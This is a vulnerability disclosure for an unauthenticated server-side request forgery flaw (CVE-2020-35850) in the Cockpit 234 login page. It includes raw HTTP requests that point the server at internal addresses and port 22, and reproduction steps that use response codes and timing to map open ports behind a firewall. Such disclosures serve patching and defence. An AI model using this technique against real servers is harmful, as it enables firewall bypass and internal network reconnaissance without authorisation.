Cockpit-Project v234 - Server-Side Request Vulnerability (unauthenticated) CVE-2020-35850
- Cockpit version: 234
- OS: Ubuntu 18.04
- Page: login
User can detect open ssh port or another open ports on server that services Cockpit last version. This is a vulnerability that allows an user send request to internal hosts for detecting open ports. So that firewall configuration can be bypassed or the server can be used like gateway by malicious user for scanning process. In addition, user induces the application to make an request back to the server that is hosting Cockpit. For example: if system admin creates iptables rule to drop all packets that come to 22 port or another port, user can detect whether port 22 is open or not.
Assuming that there is a iptables rule which port 22 is open for 127.0.0.1 (loopback interface) but is closed for other interfaces.
First HTTP Request:
GET /cockpit+=192.168.1.27:22/login HTTP/1.1
Host: 192.168.1.27:9090
User-Agent: *
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic dWJ1bnR1OnVidW50dQ==
X-Authorize:
Connection: close
Cookie: cockpit=deleted
Second HTTP Request:
GET /cockpit+=127.0.0.1:22/login HTTP/1.1
Host: 192.168.1.27:9090
User-Agent: *
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic dWJ1bnR1OnVidW50dQ==
X-Authorize:
Connection: close
Cookie: cockpit=deleted
Steps to reproduce:
On login panel,
- Click Other Options.
- Set 127.0.0.1 to Connect to field and send request with incorrect credentials.
- Intercept the request with Burp Suite
- If ssh service is open on port 22 and credentials are wrong, server returns "401 Authentication Failed" response.
- If user tries connect to a port that accepts data for ssh connection , server returns "401 Authentication failed: no-host" response and waits 10 seconds.
- If user tries connect to a closed port , server returns "401 Authentication failed: no-host" response without waiting.
- If ssh service is open on port 22 and credentials are correct, server returns "200" response.
- You can detect open ports on internal server or loopback interface of target server by changing remote port number.
